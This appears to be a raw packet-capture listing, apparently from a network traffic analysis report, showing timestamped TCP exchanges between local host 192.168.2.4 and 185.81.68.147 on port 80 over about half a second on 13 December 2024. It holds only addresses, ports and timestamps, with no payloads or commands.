                                                              Dec 13, 2024 07:47:06.855823040 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.857129097 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.857235909 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.858004093 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.858004093 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.858558893 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.858699083 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.859065056 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.859065056 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.860033035 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.860130072 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.860178947 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.860825062 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.861484051 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.861540079 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.862262011 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.862262964 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.862298012 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.862377882 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.862384081 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.863143921 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.863276958 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.863311052 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.863311052 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.863337040 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.863975048 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.864028931 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.864095926 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.864473104 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.864815950 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.864943027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.865255117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.865255117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.865658045 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.865786076 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.865794897 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.866518974 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.866641998 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.866647959 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.866647959 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.867333889 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.867381096 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.867506981 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.867603064 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.867603064 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.868201017 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.868293047 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.868331909 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.868812084 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.869076014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.869185925 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.869899988 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.869906902 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.869906902 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.870034933 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.870752096 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.870810032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.870810032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.870810032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.870857000 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.870914936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.871613026 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.871754885 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.872051954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.872051954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.872459888 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.872566938 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.872608900 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.873162031 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.873333931 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.873527050 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.874145985 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.874206066 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.874206066 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.874206066 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.874253988 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.874320030 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.996967077 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.997066975 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.997121096 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.997121096 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.997256994 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.997294903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.997384071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.997384071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.998090029 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.998137951 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.998220921 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.998269081 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.998931885 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.999033928 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.999078035 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.999078035 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.999783039 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.999833107 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.999897003 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.000041008 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.000581026 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.000708103 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.000751019 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.000839949 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.001421928 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.001472950 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.001550913 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.001597881 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.002247095 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.002374887 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.002418041 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.002521992 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.003108978 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.003169060 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.003235102 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.003329039 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.003947020 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.004005909 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.004066944 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.004148006 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.004786015 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.004837990 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.004899979 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.004980087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.005637884 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.005743027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.005788088 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.005788088 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.006544113 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.006644964 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.006799936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.006799936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.007352114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.007503033 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.007539034 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.007600069 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.008167028 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.008223057 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.008269072 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.008269072 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.009048939 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.009135962 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.009166956 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.009257078 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.009905100 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.010041952 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.010190964 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.010190964 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.010754108 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.010818958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.010885000 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.010970116 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.011595964 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.011713982 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.011758089 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.011758089 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.012407064 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.012552023 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.012598038 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.012598038 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.013279915 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.013434887 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.013436079 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.013725996 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.014115095 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.014226913 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.014262915 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.014487028 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.014947891 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.015070915 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.015091896 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.015165091 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.015796900 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.015885115 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.015933037 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.016047001 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.016676903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.016733885 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.016763926 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.016871929 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.017497063 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.017548084 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.017657995 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.017724991 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.018326044 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.018383026 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.018445969 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.018547058 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.019246101 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.019296885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.019390106 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.019612074 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.020097971 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.020153046 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.020200014 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.020200014 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.020872116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.020932913 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.020996094 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.021064997 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.021748066 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.021811962 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.021869898 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.022006035 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.022588015 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.022635937 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.022763968 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.022845984 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.023452044 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.023500919 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.023562908 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.023638010 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.024281979 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.024331093 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.024414062 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.024501085 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.025125027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.025181055 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.025326014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.025703907 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.025985003 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.026053905 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.026119947 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.026213884 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.026809931 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.026859999 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.026922941 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.026990891 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.027648926 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.027693033 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.027756929 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.027833939 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.028506994 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.028598070 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.028687000 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.028739929 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.029361963 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.029459953 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.029498100 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.029567003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.030236959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.030343056 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.030390978 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.030390978 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.031060934 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.031138897 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.031184912 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.031184912 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.031893015 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.031949043 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.032382011 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.032485962 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.032753944 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.032861948 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.032927990 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.032927990 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.033631086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.033730030 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.033777952 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.033777952 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.034440994 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.034543991 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.034586906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.034586906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.035284042 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.035346031 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.035407066 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.035491943 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.036134958 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.036243916 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.036273956 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.036350965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.036968946 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.037096024 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.037175894 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.037175894 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.037817955 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.037914038 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.037955046 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.038003922 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.038824081 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.038892031 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.038896084 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.039072990 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.039546967 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.039638996 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.039676905 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.039676905 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.040399075 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.040592909 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.040602922 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.040667057 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.041223049 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.041472912 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.189155102 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.189244986 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.189244986 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.189347029 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.189357996 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.189425945 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.189428091 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.189491034 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.190268040 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.190326929 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.190414906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.190414906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.191087008 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.191174030 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.191374063 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.191488028 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.194504023 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194575071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.194677114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194713116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194747925 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194781065 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194802046 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.194802046 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.194802046 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.194818974 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194845915 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.194856882 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194890976 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.194905043 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.194905043 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.195014954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.195760965 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.195837021 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.195909023 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.196014881 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.196621895 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.196821928 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.196831942 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.196997881 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.197777033 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.197879076 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.197957039 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.198131084 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.198298931 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.198334932 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.198388100 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.198388100 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.199048996 CET8049738185.81.68.147192.168.2.4
